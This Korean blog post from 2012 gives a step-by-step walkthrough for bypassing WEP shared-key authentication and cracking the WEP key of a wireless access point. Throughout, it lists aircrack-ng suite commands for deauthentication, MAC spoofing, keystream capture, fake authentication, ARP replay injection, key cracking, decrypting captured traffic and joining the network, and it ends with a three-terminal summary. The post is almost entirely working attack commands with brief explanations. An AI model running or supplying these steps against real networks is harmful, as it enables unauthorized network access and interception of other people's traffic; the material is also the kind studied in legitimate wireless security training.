Notice»

Recent Post»

Recent Comment»

Recent Trackback»

Archive»

« 2024/12 »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31

 

'WEP'에 해당되는 글 1

  1. 2012.12.13 무선랜 해킹 (2) WEP 인증 우회 및 크랙
 

무선랜 해킹 (2) WEP 인증 우회 및 크랙

Network | 2012. 12. 13. 01:13 | Posted by binaryU

* aireplay-ng -0 5 -a 00:00:00:00:00:00 mon0

  - 인증해제(-0) 패킷 5개를 맥주소가 00:00:00:00:00:00인 AP에 보냄


* Filter: wlan.fc.type_subtype == 0x0c

  - 인증해제 패킷 필터


* airodump-ng -c 11 -a --bssid 00:00:00:00:00:00 mon0

  - AP의 11번 채널(-c)에 연결(-a)된 클라이언트(맥주소) 확인


* macchanger -m aa:aa:aa:aa:aa:aa wlan0

  - wlan0의 맥주소를 aa:aa:aa:aa:aa:aa으로 수푸핑

  - 비교: ifconfig wlan0 hw ehter aa:aa:aa:aa:aa:aa


* airodump-ng mon0 -c 11 --bssid 00:00:00:00:00:00 -w keystream

  - keystream으로 시작하는 파일로 패킷 캡쳐 (cap,csv,xor,kismet.csv,kismet.netxml)

  - AUTH열이  SKA(Shared Key Authentication)으로 변경되면 캡쳐 성공( WEP 우회가능)

  - 비교: -c와 --channel, -w와 --write


* aireplay-ng -1 0 -e binaryU -y keystream~.xor -a [AP맥] -h [공격자맥] mon0

  - SSID가 binaryU이고 맥주소가 [AP맥]인 AP에 keystream~.xor을 사용하여 인증 시도


* Filter: wlan.addr == aa:aa:aa:aa:aa:aa

  - 송수신 맥주소가 aa:aa:aa:aa:aa:aa인 패킷 필터


* airodump-ng --bssid 00:00:00:00:00:00 --channel 11 --write WEPCracking mon0

  - WEPCracking으로 시작하는 피알로 패킷 캡쳐 (cap,csv,xor,kismet.csv,kismet.netxml)

  - #Data열이 10000이상 될 때까지 대기 또는 인젝션 (약 5~10분, WEP 크랙 가능)


* aireplay-ng -3 -b 00:00:00:00:00:00 -h aa:aa:aa:aa:aa:aa mon0

  - 이미 인증된 클라이언트의 맥(aa:aa:aa:aa:aa:aa)으로 ARP응답(-3)을 인젝션


* aircrack-ng WEPCracking-01.cap

  - 분석할 패킷이 부족하면 일시중지 후 더 많은 패킷을 기다렸다가 자동으로 재시작


* airdecap-ng -w abcdefabcdefabcdefabcdef12 WEPCracking-01.cap

  - 크랙한 WEP키(abcdefabcdefabcdefabcdef12)를 이용한 캡쳐파일 복호화


* tshark -r WEPCracking-01-dec.cap -c 10

  - 복호화된 캡쳐파일 WEPCracking-01.cap의 상위 10개 패킷 확인


* iwconfig wlan0 essid "binaryU" key abcdefabcdefabcdefabcdef12

  - 크랙한 WEP키(abcdefabcdefabcdefabcdef12)를 이용한 AP 연결


* dhclient3

  - ip 동적 할당 및 dns 동적 설정


** 최종정리 3 터미널 **

===========================================================================

A터미널 : airodump-ng mon0

A터미널 : airodump-ng --bssid 00:00:00:00:00:00 --channel 11 --write WEPCracking mon0

B터미널 : aireplay-ng -1 0 -e binaryU -a 00:00:00:00:00:00 -h aa:aa:aa:aa:aa:aa mon0

B터미널 : aireplay-ng -3 -b 00:00:00:00:00:00 -h aa:aa:aa:aa:aa:aa mon0

C터미널 : aircrack-ng WEPCracking-01.cap

===========================================================================

: